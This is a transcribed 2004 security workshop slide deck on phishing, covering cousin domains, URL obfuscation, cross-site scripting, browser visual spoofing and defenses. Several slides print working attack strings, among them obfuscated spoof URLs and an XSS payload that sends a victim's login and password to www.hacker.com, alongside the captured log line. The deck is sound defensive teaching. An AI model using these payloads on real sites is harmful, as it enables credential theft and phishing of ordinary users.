SlideShare ist ein Scribd-Unternehmen logo

Phishing exposed

T
tamfin
1 von 110
Downloaden Sie, um offline zu lesen
Supported by Computer Studies Division, City University of Hong Kong
Presented by Mr. Alan Lam Mr. Bernard Kan Mr. S.C. Leung 2 (PHISHING )
Disclaimer • This material is NOT intended to be adopted in the course of attacking any computing system, nor does it encourage such act. • PISA takes no liability to any act of the user or damage caused in making use of this report. • The points made here are deliberately kept concise for the purpose of presentation. If you require technical details please refer to other technical references. 3 (PHISHING )
Copyright • The copyright of this material belongs to the Professional Information Security Association (PISA). • A third party could use this material for non-commercial purpose, given that no change in the meaning or interpretation of the content was made and reference is made to PISA. All rights are reserved by PISA. 4 (PHISHING )
Agenda 1. Overview of Phishing ? 1.1 What is Phishing? 1.2 Examples of Phishing .. email, web site 1.3 Current Profile of Phishing Attack 2. Attack Strategies & Technologies and Defenses 2.1 Cousin URL Attack 2.2 URL Obfuscation Attack 2.3 Face Lift Attack 2.4 Cross-site Scripting Attack 2.5 Visual Spoofing Attacks 2.6 Other Attacks 3. Defense Strategies Against Phishing Attack 3.1 Policy and User Education 3.2 Prevention 3.3 Detection 3.4 Incident Response and Collaboration 5 3.5 Long Term Dev’t in technology infrastructure and legislation (PHISHING )
1.1 What is Phishing? Phishing attacks use 'spoofed' e-mails and fraudulent websites designed to fool recipients into divulging personal financial data such as credit card numbers, account usernames and passwords, social security numbers, etc. Quoted from http://www.antiphishing.org 6 (PHISHING )
Origin of Term • Phreaking + Fishing = Phishing • Phreaking: exploiting vulnerability of phone system to make calls without paying in the 70’s • Fishing : Use of bait to get target on hook • 7 (PHISHING )
Why Phishing becomes a threat to us? • Online transaction, such as e-banking, becomes more and more popular – Versign July 2004 report: eCommerce yearly increase by 13.2% • In order to make their online transaction service easy to use an please their d customers, some service providers sacrifice good security feature, such as user certificate. • Fantasy web features (DHTML, Java, ActiveX, Flash, XML) introduce new web vulnerabilities which may not be caught up by most service providers and browser vendors. And these web features are supported by most email/newsreaders, search engines, chat rooms, or ICQ. • Spamming technology and facilities are becoming mature. Legislation in this area cannot catch up. • Internet being a Virtual World, it lacks a physical identity for user to validate. Trust building is an intrinsic problem. • The current Internet infrastructure is insecure by default. • It is much cheaper and safer for attackers to carry out fraud in the Internet. • All the above points encourage attackers to gain financial profit by Phishing attack. 8 (PHISHING )
How does Phishing work? • Social engineering used in the crafted Spam email and Fake web site – Use spoofed identity (of trusted organization) to gain trust – Use the wording and tune that the trusted organization usually uses – Emphasize an urgency to “update” or “validate” data to rectify problem – Threaten to terminate account or process the mistaken transaction – Inform user to get free coupon or win lottery because of product promotion • Luring victim to a bogus website (the net in fishing) – Convincing URL – Disguised web interface • Make the bogus web site look like the original web site. • Detail level down to fonts, company logo, or even the browser UI – When users login the bogus website, username and password are captured. 9 (PHISHING )
Workflow of Phishing Attack 1. Preparation a. Research and Development • Identify the target organization • Identify the vulnerability of the target organization web page • Iidentify the vulnerability of email reader and web browser that can facilitate the attack b. Prepare scam email and Capture website according to the above collected information c. Gather or purchase email addresses d. Ride on SMTP Open Relay or purchase similar services 2. Attacking a. Send out scam mail (the bait) via open relay server / services b. Post the scam mail to newsgroups, chartrooms, ICQ messages or Banner advertising c. Submit the bogus website to search engines d. Wait for victim at the Capture Website (the trapping net) 3. Harvesting a. Capture data collected at Capture Website b. Use or Sell the data or captured hosts… 10 (PHISHING )
Phishing Categories Attackers’ Objectives – Fraud in money transfer – Fraud in personal information theft – Installing Key Logger and Trojan for other purposes such as proxy for other attacks Loss and Damage – Financial – Leakage of sensitive information – Control of computer fallen to attacker – Damage to branding and corporate image – Damage to consumer confidence in online transaction and eventually impact Image Source: www.jcsbank.com/ phishing.html development of e-Commerce 11 (PHISHING )
Demonstration 1 Examples of Phishing PayPal Ebay Hang Seng Bank HSBC Citibank US Bank SunTrust Bank Citizens Bank 12 (PHISHING )
1.3 Current Profile of Phishing Attack References • Verisign Internet Intelligence Briefing (2004-07) – http://www.verisign.com/stellent/groups/public/documents/white_paper/00 6583.pdf • Anti-Phishing Working Group (APWG) Trend Report (2004-06) – http://www.antiphishing.org/APWG_Phishing_Attack_Report-Jun2004.pdf • Gartner Report (2004-06) – Internet Banking Fraud had brought about loss of US$2.4B – http://www.itu.int/osg/spu/newslog/categories/indicatorsAndStatistics/2004 /06/21.html#a692 • Hong Kong Police Statistics (2004-07) 13 (PHISHING )
Anti-Phishing Working Group Trend Report (2004-06) Monthly Unique phishing attacks 1500 1422 1125 1197 Count of unique 1000 attacks 402 500 282 176 0 Jan-04 Feb-04 Mar-04 Apr-04 May-04 Jun-04 Month 14 (PHISHING )
Phishing Attack Target (APWG 2004-06) 1. Citibank 2. eBay 3. US Bank 4. Pay Pal 12 VISA 17. HSBC 15 (PHISHING )
Phishing Web site location Verisign (2004-07) APWG (2004-06) Verisign APWG Country Percentage Country Percentage USA 63 USA 27 South Korea 10 South Korea 20 Mainland China 5 Mainland China 16 Brazil 2 Taiwan 7 Poland 2 Holland 3 • Phishermen usually choose location (APWG 2004-06) – Where there is language or time zone difference with brand owner, to create the barrier to close down the bogus web site – On compromised machines (25% by analysis) 16 (PHISHING )
Phishing Sender Source • Verisign (2004-07) • APWG (2004-06) 2% 5% 1% 7% 92% 93% Spoofed Address Spoofed Address Cousin Address Cousin Address Web Email Address Web Email Address 17 (PHISHING )
Phishing impact can be great • Impact to USA (Gartner Report 2004-06) – 57 million US consumers attacked – 3-5% recipients became victims – About 1.98 million reported their account intruded – Loss involved was US$2.4 billion (average loss per victim US$1,200) 18 (PHISHING )
Phishing and Bogus Website in Hong Kong Phishing and Bogus Website Report 50 45 Reported Cases 40 36 30 30 28 25 20 14 10 3 3 4 4 3 4 1 2 1 2 2 2 0 0 0 0 0 1 1 1 0 04 3 3 03 04 3 4 4 3 4 4 3 3 v-0 l-0 p-0 b-0 r-0 g-0 r-0 -0 c-0 t-0 n- n- n- Ju ay Ma Ap No Oc Ju De Ju Ja Fe Se Au M Phishing Report Bogus Website Source: Hong Kong Police Force 19 (PHISHING )
2. Attack Strategies and Technologies • Before 2003, Social Engineering was the major attack – Email with impersonated name and logo, together with disguised tone of messages – Two technical tricks were also used • Cousin URL carry similar • Bogus URL using old techniques • Since 2003, technologies emerged to trick the browser, or even mimic the SSL web page style • Face Lift • Bogus URL using new techniques • Cross-site Scripting • Visual Spoofing • Other attacks 20 (PHISHING )
2.1 Cousin URL Hong Kong Banking Some Cousin URL as example Bogus Websites (Red: Bogus Cousin URL) 2003 (Jan-Dec) 8 cases • ? ? ? ? (www.hkbea.com) 2004 (Jan - Jul) 18 cases • www.eastasiacredit.com • www.onlinebea.com • ? ? ? ? (www.hsbc.com) • www.hkhsbc.com • ? ? ? ? (hk.dbs.com) • www.dbshk.net • ? ? ? ? (www.standardchartered.com) • www.scbltd.com • ? ? ? ? (www.dahsing.com) • www.dasxin.com • www.dlfh.com • ? ? ? ? (www.iba.com.hk) • www.ibabankhk.com Source: • www.hkiba.com Hong Kong Police Force • More… 21 (PHISHING )
Cousin URL: https://visa-secure.com/personal/secure_with_visa/ 22 (PHISHING )
2.2 URL Obfuscation Attack • Normal representation of URL – Domain: http://www.pisa.org.hk • Dotted representation of IP address URL – Decimal: http://202.81.255.242 – Hexadecimal: http://0xca.0x51.0xff.0xf2 – Octal http://0312.0121.0377.0362 • Dot-less representation of IP address URL – Decimal: http://3639552355 http://7689338866 … – Hexadecimal: http://0xCA51FFF2 – Reference: A dot-less Decimal IP calculator can be found at http://www.tcp-ip.nu/cgi-bin/tcp-ip/calc.cgi 23 (PHISHING )
2.2 URL Obfuscation Attack • Valid Use of “@’ – “RFC1738 - URL”? ”RFC2396 – URI Generic Syntax” allows a valid Uniform Resource Locators (URL) syntax <user>:<password>@<host>:<port>/<url-path> – Application: use URL to carry username and password, e.g. • ftp://user1:pass@myftp.com:1021/public/file1.gzip • Malicious Use of “@’ to hide bogus host – http://www.microsoft.com@www.pisa.org.hk – http://www.microsoft.com@202.81.255.242 (IP address) – http://www.microsoft.com@3394371570 (decimal representation) – http://www.microsoft.com111111111111111111111111111111111111 11111111111111111111111@3394371570 • Browser’s Address bar and Status bar CAN DISPLAY the actual content but normal user may not notice 24 (PHISHING )
2.2 URL Obfuscation Attack • Escaped Encoding (or % encoding) – RFC1738 - URL”? ”RFC2396 – URI Generic Syntax” allows URL encoded as ASCII in Hexadecimal representation – ”%##” (## : 00 – FF) • %20= [space], %2E=“.”, %7E=“~” • %31=“1”, %32=“2” • %41=“A”, %61=“a” – Where will this URL bring you to? • http://www.microsoft.com@%79%61%68%6F%6F%2E%63%6F%6D http://www.microsoft.com@yahoo.com • Browser’s Address bar and Status bar CAN DISPLAY the actual content but normal user may not notice • Reference of % Encoding and online encode/decoder http://www.blooberry.com/indexdot/html/topics/urlencoding.htm 25 (PHISHING )
2.2 URL Obfuscation Attack • Other derived formats of URI – Unicode encoded URL • Unicode was designed to allow multiple language implementations of the ASCII character set • http://&#119;&#119;&#119;&#46;&#112;&#105;&#115;&#97;& #46;&#111;&#114;&#103;&#46;&#104;&#107; – Mixed Unicode and ASCII • http://&#119;&#119;&#119;%2E%70%69%73%61%2E%6F%72%6 7%2E%68%6B • References Unicode Encoding: http://www.unicode.org/ Free Online UTF Decoder (choose “Freeform numeric): http://software.hixie.ch/utilities/cgi/unicode-decoder/utf8-decoder 26 (PHISHING )
2.2 URL Obfuscation Attack • IE or other browser Vulnerability in displaying proper URL at – Status Bar – Address Bar 27 (PHISHING )
URL Obfuscation Attack (Status Bar) • Inline Javascript – <A Href= … onMouseOver=..> • <Form> • <Table> • <Table Border> • <Image Map> 28 (PHISHING )
URL Obfuscation Attack (Address Bar) (IE vulnerability in displaying URL) • IE 5.x ? 6.0 has a vulnerability in handling URL. When the URL contains special characters, the character string after the special character cannot be displayed. (Microsoft knowledgebase article 834489) • For example, use escaped encoded characters %00 (null character) and %01 – http://www.yahoo.com%01%00@www.pisa.org.hk – http://www.yahoo.com%01%00@202.81.255.242 – http://www.yahoo.com%01%00@3394371570 • IE will bring user to “www.pisa.org.hk”, whereas the Address bar and Status bar cannot display the true visited URL! 29 (PHISHING )
IE vulnerability in displaying URL • MS04-004 (2004-02) released a patch to remove support in HTTP to the URI format <user>:<password>@ <host>:<port>/<url-path> http://www.microsoft.com/technet/s ecurity/Bulletin/MS04-004.asp • However, after applying the patch, Address bar and Status bar still do NOT display the correct URL. 30 (PHISHING )
Known Attack using the MS04-004 • Exploit-URLSpoof Trojan • McAfee alert http://vil.nai.com/vil/cont ent/v_100927.htm 31 (PHISHING )
IE vulnerability in handling URL • Works with DNS server which accepts dummy subdomain, e.g. http-equiv.dyndns.org • http://www.microsoft.com.technet.security.bulletin.MS04- 029.mspx.12345.123451234512345678901234567123456789 0123456789.box&&cm=&ce=3&hl=malware.http- equiv.dyndns.org/~http-equiv/mwaresoft.html Effective = *.http-equiv.dyndns.org/~http-equiv/mwaresoft.html • Reference URL: http://www.malware.com/malwaresoft.html 32 (PHISHING )
2.2 URL Obfuscation Attack • Shortened URL – http://www.rapp.org/url/ • PISA http://www.rapp.org/url/?IUVST6C8 • Workshop: Phishing Exposed http://www.rapp.org/url/?KRRQ7YYH – http://csua.org/u/ • PISA http://csua.org/u/9fy • Workshop: Phishing Exposed http://csua.org/u/9iu 33 (PHISHING )
Demonstration 2 URL Obfuscation Attacks 34 (PHISHING )
2.3 Face Lift ( ) • Use URL Redirect or similar technology • Take advantage of the real web site’s face to confuse the identity of Bogus Login Page <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/"> Online Banking Main Page (real) Online Login (bogus) Usename myuserid Password ******* 35 (PHISHING )
Case Study ANZ bank phishing Email content : : “%##” Hexidecimal format : http://anz.com.au%32inetbank%32%32%32@%36%31%2E%31%30%2E%31%32 : %30%2E%32%30%30 %32%37%38%34/%69%6E%65%74%62%61%6E%6B/%6 9%6E%64%65%78%2E%68%74%6D Bogus URL – old technique http://anz.com.au2inetbank222 @61.10.120.200:2784/inetbank/index.htm 36 (PHISHING )
Content of BOGUS web page “http://61.10.120.200:2784/inetbank/index.htm” : <script LANGUAGE="JavaScript"> : SafeAddOnload(PUWStart); 1 PopUp page Login gPopupWindow = new PopupWindow("login.htm", 350, 150); gPopupWindow.toolbar = false; gPopupWindow.statusbar = true; gPopupWindow.resizable = true; gPopupWindow.ontop = true; </script> </head> <body bgcolor="#FFFFFF" text="#000000"> 2 Background Redirect <META HTTP-EQUIV="Refresh" CONTENT="0; 37 url=http://www.anz.com.au/"> (PHISHING )
Online Banking Login (Bogus) 1 PopUp page Login No SSL 2 Background Redirect <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/"> 38 (PHISHING )
Case Study ANZ bank phishing Face Lift 2 2 1 userid ******** 39 (PHISHING )
Case Study ANZ bank phishing Track Hiding After entering PIN SSL padlock shown ??!! 40 (PHISHING )
Online Banking Login (real) Real digital cert of web site Real login has SSL padlock 41 (PHISHING )
Defense vs. Cousin URL (Prevention) • Use a consistent and persistent web interface • Communicate a Single Simple Domain name XYZBank owns these domains and have web servers for each xyzbank.com xyzcorp.com xyzgroup.com They use these domains for Online banking online-xyzbank.com secure-xyzbank.com They use these domains for HK and Australia Online banking online-xyzbank.com.hk secure-xyzbank.com.au 42 (PHISHING )
Defense vs. Cousin URL (Prevention) • Is this better? XYZBank owns these domains xyzbank.com (only active domain) xyzcorp.com (forward to xyzbank.com) xyzgroup.com (forward to xyzbank.com) They these SubDomain for Online banking online.xyzbank.com (personal banking) secure.xyzbank.com (corporate banking) They use these URL paths for HK and Australia Online banking online.xyzbank.com/hk/ secure.xyybank.com/au/ 43 (PHISHING )
Defense vs. Cousin URL (Detection) • Brand Management • Domain Monitoring Can be Outsourced • Web Crawling • Intelligence Report from Spam Filtering services 44 (PHISHING )
Detection (Server side) • Detect Mirroring from Copycat Web Site – Monitor large volume traffic, especially from a single subnet – Placing Honeypot links (invisible links with no effective use) to detect access check “access log” • Detect Referral Site – At your web server monitor the referrer information from the “access log”, it may give you information of referral site, search engine or attacker by FaceLift / Framing /etc. attack 45 (PHISHING )
Server and Site Design Reference • PISA’s HK e-Commerce Security Survey 2003 – Non-intrusive and Anonymous study on 25 local on-line transaction sites • Application design • SSL and Encrypted Communication Digital Certificate Implementation • Password Management • Operation Control – URL • http://www.pisa.org.hk/projects/websec2003/websec2003.htm 46 (PHISHING )
Detection (Client side) • Browser – check digital certificate; and turn on alert when browser enters or leaves SSL mode 47 (PHISHING )
Detection (Client side) • SpoofStick (browser • eBay Toolbar (browser plug-in) plug-in – Incorporated “Web CallerID” technology (acquired from WholeSecurity) to detect suspicious activity in web page. Web CallerID acts like a heuristic filter for phishers, detecting previously undiscovered spam • http://www.eweek.com/art icle2/0,1759,1636422,00.a sp 48 (PHISHING )
Detection (Client) • Some Antivirus programs detect malicious popup javascript in web page 49 (PHISHING )
Detection (Client) • http://%32%31%31%2E%39%37%2E%32%34%38%2E%36 %30:%38%37/%63%69%74/%69%6E%64%65%78%2E%68 %74%6D ( http://211.97.248.60:87/cit/confirm.htm) 50 (PHISHING )
2.4 Cross-Site Scripting • A cross-site scripting vulnerability allows the introduction of malicious content (scripts) on a web site, that is then served to users (clients) – Malicious scripts get executed on clients that trust the web site – Problem with potentially all client-side scripting languages • Use “XSS” to refer to these vulnerabilities, to avoid confusion with “CSS” (cascading style sheets) 51 (PHISHING )
XSS Concept • Any way to fool a legitimate web site to send malicious code to a user’s browser • Almost always involves user content (third party) – Error messages – User comments – Links • References – http://www.cert.org/archive/pdf/cross_site_scripting.pdf – http://www.spidynamics.com/support/whitepapers/SPIcross -sitescripting.pdf 52 (PHISHING )
Why the Name • You think that you interact with site Z • Site Z has been poisoned by attacker • The “poison” (e.g. JavaScript) is sent to you, along with legitimate content, and executes. It can exploit browser vulnerabilities, or contact site M and steal your cookies, usernames and passwords... Z Surfing Poison Poison Hostile Code Executes M 53 (PHISHING )
XSS Risks • Theft of account credentials and services • User tracking (stalking) and statistics • Misinformation from a trusted site • Denial of service • Exploitation of web browser – Create phony user interface – Exploit a bug in the browser – Exploit a bug in a browser extension such as Flash or Java • Etc. 54 (PHISHING )
XSS Risks - Stolen Account Credentials • With XSS, it may be possible for your credentials to be stolen and used by attacker • With sites requiring authentication need to use a technological solution to prevent continuously asking users for passwords – Credentials have the form of a SessionID or nonce • Url encoding (GET method) – http://www.site.com?ID=34539027644 • Cookies are commonly used to store credentials – These are usually accessible to client-side scripts 55 (PHISHING )
Cookie Mechanism and Vulnerabilities • Used to store state on the client browser • Access Control – Includes specification of which servers can access the cookie (a basic access control) • Including a path on the server – So cookie can be used to store secrets (sessionIDs or nonces) 56 (PHISHING )
XSS - Point • XSS vulnerabilities fool the access control mechanism for cookies • The request for the cookie (by scripts) comes from the poisoned server, and so is honored by the client browser – No vulnerabilities needed in the client browser 57 (PHISHING )
XSS Risk - Privacy and Misinformation • Scripts can “spy” on what you do – Access history of sites visited – Track content you post to a web site • Scripts can misinform – Modify the web page you are viewing – Modify content that you post • Privacy (“I have nothing to hide”) – Knowledge about you can be valuable and be sued against you • Divorces, religion, hobbies, opinions • etc. 58 (PHISHING )
Example: Google’s XSS Vulnerability • Just get to public at Oct 20. • Scripts can be injected into Google to make it become a subscription service: – http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%7 0%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75 %6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28% 64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65 %6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73% 72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69 %6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27 59 (PHISHING )
Example: Google’s XSS Vulnerability 60 (PHISHING )
XSS Risk - Denial of Service • Nasty JavaScripts can make your web site inaccessible – Make browsers crash or become inoperable – Redirect browsers to other web sites 61 (PHISHING )
XSS Risk - Silent Install • Exploitation of browser vulnerabilities – JavaScript, ActiveX, etc. allow the exploitation of browser vulnerabilities • Run locally on your machine • User security confirmation bypass vulnerability in Microsoft Internet Explorer 6.0 SP2: – http://securityfocus.com/bid/11200/ – Allows malicious users to trivially bypass the requirement for user confirmation to load JavaScript or ActiveX – Installation of malicious code 62 (PHISHING )
XSS Risk - Phishing • User Interface Modifications – Present fake authentication dialogs, capture information then perhaps redirect user to real web site – Replace location toolbar to make user think they are visiting a certain web site • Phishing Scenario • Victim logs into a web site • Attacker has spread “mines” using an XSS vulnerability • Victim stumbles upon an XSS mine • Victim gets a message saying that their session has expired, and they need to authenticate again • Victim’s username and password are sent to attacker 63 (PHISHING )
Demonstration 3 - www.pisabank.com 64 (PHISHING )
After successful user login... 65 (PHISHING )
However, if login failed... 66 (PHISHING )
Try to put scripts in URL... 67 (PHISHING )
Reveal the injected scripts... 68 (PHISHING )
Target to inject codes like this... 69 (PHISHING )
We create the following url... • http://www.pisabank.com/banklogin.jsp?serviceName=PisabankCaastAcce ss&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_ URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action= %22login1.asp%22%20method=%22post%22%20onsubmit=%22XSSimag e%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20% 2b%20document.forms(2).login.value%20%2b%20':'%20%2b%20docume nt.forms(2).password.value;%22%3E 70 (PHISHING )
Put the url in scam mails... 71 (PHISHING )
When the hyperlink is clicked... 72 (PHISHING )
After the user login, nothing special... 73 (PHISHING )
However... • In www.hacker.com’s web server log, login name and password are recorded – 192.168.0.1 - - [14/Oct/2004:11:01:52 +0800] "GET /bernard:IlovePisa HTTP/1.1" 404 719 74 (PHISHING )
XSS - Prevention • For users: – disable scripting in browser (some personal firewall can selectively block/allow scripts from particular web sites) – do not trust links in e-mails, type url directly in browser – always logout before browsing elsewhere – keep up with web browser patches and versions 75 (PHISHING )
XSS - Prevention • For administrators/developers: – User input should be parsed and filtered properly, especially < > “ ‘ % ; ) ( & + - – Some decent guidelines for input filtering can be found in the OWASP Requirements document "OWASP Guide to Building Secure Web Applications and Web Services“ • http://www.owasp.org/documentation/guide.html – Output based on Input parameters should be encoded into ISO 8859 -1 for special characters • http://www.cert.org/advisories/CA-2000-02.html 76 (PHISHING )
XSS - Prevention • For administrators/developers: – For cookies: set the HttpOnly flag. Scripts that run in a browser can’t access cookie values with flag set – Keep up with web server patches – periodically test for XSS vulnerabilities by using web application scanners • e.g. Web Scarab http://www.owasp.org/software/webscarab.html 77 (PHISHING )
XSS - Detection • XSS exploits can be detected by reviewing web server access log, e.g.: 192.168.1.152 - - [14/Oct/2004:10:38:11 +0800] "GET /banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte &source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E% 3Cform%20action=%22login1.jsp%22%20method=%22post%22%20onsubmit=%22XSSimag e%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20%2b%20document .forms(2).login.value%20%2b%20':'%20%2b%20document.forms(2).password.value ;%22%3E HTTP/1.1" 200 4058 78 (PHISHING )
XSS - Detection • XSS exploits can also be detected by network- based Intrusion Detection System (IDS), e.g. [**] WEB-MISC cross site scripting attempt [**] 10/21-23:04:54.960511 192.168.1.152:3341 -> 192.168.1.100:80 TCP TTL:128 TOS:0x0 ID:28082 IpLen:20 DgmLen:307 DF ***AP*** Seq: 0xAB1F9A5C Ack: 0xEFB2E94B Win: 0x4470 TcpLen: 20 47 45 54 20 2F 62 61 6E 6B 6C 6F 67 69 6E 2E 6A GET /banklogin.j 73 70 3F 65 72 72 3D 3C 73 63 72 69 70 74 3E 61 sp?err=<script>a 6C 65 72 74 28 27 58 53 53 27 29 3C 2F 73 63 72 lert('XSS')</scr 69 70 74 3E 20 48 54 54 50 2F 31 2E 31 0D 0A 41 ipt> HTTP/1.1..A 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 ccept: */*..Acce 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D pt-Language: zh- 68 6B 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 hk..User-Agent: 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D Mozilla/4.0 (com 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 2E patible; MSIE 6. 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 0; Windows NT 5. 30 29 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 70 69 0)..Host: www.pi 73 61 62 61 6E 6B 2E 63 6F 6D 0D 0A 43 6F 6E 6E sabank.com..Conn 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 ection: Keep-Ali 76 65 0D 0A 43 6F 6F 6B 69 65 3A 20 4A 53 45 53 ve..Cookie: JSES 53 49 4F 4E 49 44 3D 32 42 43 43 39 44 45 36 43 SIONID=2BCC9DE6C 44 43 46 45 44 44 37 45 32 35 42 43 46 33 44 36 DCFEDD7E25BCF3D6 38 39 35 38 30 46 32 0D 0A 0D 0A 89580F2.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 79 (PHISHING )
2.5 Visual spoofing • Target to the web browser interface • Display fake menu bar, status bar, dialogue box on a web browser – The address bar displays the fake URL address – The status bar shows displays the golden “lock” icon indicating a secure SSL session, which has often been cited as a differentiator between legitimate sites and scams – The download or installation dialogue box shows fake information 80 (PHISHING )
How it works? Graphic substitution approach 1. The bogus web page are opened without the menu bar and status bar window.open(“bogus.htm", "_blank", "height=700, width=683, location=no, menubar=no, toolbar=no, status=no, resizable=no, scrollbars=no"); 2. The menu bar and status bar (with the golden “lock” icon) images are displayed at the top and bottom of the bogus web page to disguise as part of the browser user interface 81 (PHISHING )
Graphic Substitution Approach Header image Bogus web content Footer image 82 (PHISHING )
Graphic Substitution Approach 3. Combine with the java commands “window.createPopup()” and “popup.show()”, attacker can hijack the entire user’s desktop and construct a fake interface to capture and manipulate what the user sees. op=window.createPopup(); op.document.body.innerHTML="...html..."; op.show(0,0,screen.width,screen.height,document.body); 83 (PHISHING )
Browser UI Rebuild Approach 1. The bogus web page are opened without the menu bar and status bar 2. Some browser user interface functions (including the certification view function) are rebuilt on the bogus web page through download XUL (XML- based User interface Language. Standards based language developed by mozilla.org to create cross- platform user interfaces for Mozilla-based products such as the browser.) Reference: http://www.nd.edu/~jsmith30/xul/test/spoof.html 84 (PHISHING )
Browser UI Rebuild Approach 85 (PHISHING )
Overriding Page Content Approach • IE browser allows creation of chromeless windows which are screen objects that do not have the normal borders and other controls attached to them. Through javascript, they can be positioned to hide or replace (by “sitting on top”) underlying content. • Attackers make use of these chromeless windows to spoof the graphical components of browser, such as URL address bar and dialogue boxes for file download, software installation, and bookmark. 86 (PHISHING )
2.5 Visual spoofing • Defense – Keep your web browser updated – Disable the javascript functions which hide your web browser menu and status bar – Check the page info and property of the view web page before proceed – Print mark browser UI 87 (PHISHING )
Demonstration 4 Visual Spoofing Graphical Substitution FireFox Browser UI Rebuild Approach Chromeless Window 88 (PHISHING )
2.6 Other Attack Trojan, Keylogger, Screen Grabber Attacker can lure victim to install Trojan horse program through a bogus software patch or update web page. Once the victim has installed the Trojan horse program, the attacker can closely monitor the victim PC activities by capturing its keystroke and screen display. – Keylogger • Capture the victim keystroke in all windows – Screen Grabber • Screen dump or even video stream the victim screen display 89 (PHISHING )
Demonstration 5 Keylogger and Screen Grabber Using BackOrifice 90 (PHISHING )
2.6 Other Attack Man in the Middle Attack By poisoning the victim DNS server, attacker can redirect the traffic of a legitimate site to the attacker server where the attacker can sniff password information even in the HTTPS connection. Legitimate web server The victim thought that he is talking to the legitimate site Victim PC Actually, the victim is talking to the attack server Attacker server which sniff the password information and proxy the HTTPS traffic between the victim and legitimate web server 91 (PHISHING )
New Quiet Attack (4-Nov-2004) • Change of HOST file – Capture online banking details WITHOUT requiring users to click on a website link – Works even if USER TYPE IN URL MANUALLY – Working Principle • Execution of trojan to modify HOSTS file • HOSTS file override DNS resolution • User brought to malicious site next time he go to that online transaction site. • Defense – Ensure Windows Scripting Host is disabled – Have AV and antispyware software installed • Reference: http://www.vnunet.com/news/1159171 92 (PHISHING )
Defense Strategies At end user side • NEVER follow any link in e-mail, post article, chart room, ICQ message, or Banner advertising • Enable your personal firewall to allow only necessary traffic to go through • Keep your software (mail reader, web browser, virus definition) patched and updated • Use the PKI properly 93 (PHISHING )
Defense Strategies At server side • Make sure the web programs are fully tested such as input parsing and invalid input handling • Monitor any cousin domain created • Monitor any phishing e-mail or post message that targeting your organization in major search engines and your Honeypot accounts • Monitor your web server log and identify any suspicious web pages from the referer information • Provide secure web proxy service for their customers. This web proxy can only connect their legitimate web sites and nothing else • Provide secondary authentication for transaction. E.G. send one-time password to client through mobile SMS 94 (PHISHING )
Defense Strategies At system and network admin side • Deploy anti-spamming and anti-virus measures E.G. Black/white lists, keywords lists, semantics analysis, various rules and characteristics, Bayesian Filtering, Challenge-Response Filtering, SMTP Session Verification, TurnTideT Anti-spam Router … etc. • Deploy Firewall, Intrusion Detection System and Intrusion Prevention System to block attack and Trojan backdoor connections • Put all non-server machines in private IP networks • Educate the users and make sure they stay with the updated software patch At the software vendor side • Do not assume users have certain security knowledge or awareness to use their products safety and wisely • Do not lower the security level in their product default setting • Don’t just make money. Spend more time to fix the bug and fully test the product 95 (PHISHING )
The Picture of Trust Perception - Social engg. Look and Feel - Cousin URL Message and Tone - Face Lift Trust Branding Trust Physical Settings CA Weak Weak Operation? Operational Security Validation Chain of Trust Certificate & Revocation Email Sender Validation XSS Vulnerabilities Application Application Apps Visual *Browser* Transport (Host) Spoofing SSL Transport MITM, Network (Internet) DNS, Hosts file Network Routing DNS poison Network MITM, Link (LAN) ARP Sniffing Link Resolution Client IT Infrastructure Server 96 (PHISHING )
Defense Strategies • Policy and User Education • Prevention • Detection • Incident Response and Collaboration 97 (PHISHING )
3.1 Policy and User Education • – HKMA Guideline • Circular on monitoring Online Banking Regulation of Bogus web site – Regulating the use of domain name • HKMA and HKIRC cooperate in regulating the use of words “bank” and “banque” in “.hk” domain • Is a further regulation to mandate all authorized banking institutions to use “.bank.hk” a useful strategy? – Note: it still cannot stop technique like “Visual Spoofing” • Human is the weakest link – Trust too easily 98 (PHISHING )
3.1 User Education • Consumer Education – Pamphlet “Internet Banking – Keeping Your Money Safe” • by HKAB(Hong Kong Association of Banks) http://www.hkab.org.hk/PDF/customer_info/ebanking _e.pdf – TV and Radio programs • by HKMA and HKPF – Public seminars • by HKCERT – Alerts on some bank web sites 99 (PHISHING )
3.2 Prevention Technical • HKMA announced in June 2004 that within 12 months, all authorized institutions should deploy two-factor authentication in high risk transactions – One time password (e.g. secure ID token, SMS one time password) – Digital certificate in Smart ID Card 100 (PHISHING )
3.2 Other Prevention & Detection • See previous sections on specific attacks 101 (PHISHING )
3.4 Incident Response and Collaboration • Report and Alert – SFC (Security and Futures Commission) reward the report of fraudulent copycat websites and phishing scams targeting Hong Kong investors. • Smart Investor Award http://www.hksfc.org.hk/eng/investor/html/smart_investor_award.h tm – HKMA and SFC publish Unregistered financial and stock transaction web site • http://www.hkma.gov.hk • http://www.hksfc.org.hk/chi/investor/html/unlicensed_overseas_comp.htm – Quick reaction and publishing of news in Media and Press 102 to alert the public (PHISHING )
3.4 Incident Response and Collaboration • Local Collaboration – Police, HKCERT and ISPs cooperating to close down bogus web sites in Hong Kong – Police, HKMA and HKAB has standing collaboration body, meeting regularly on banking fraud prevention and response 103 (PHISHING )
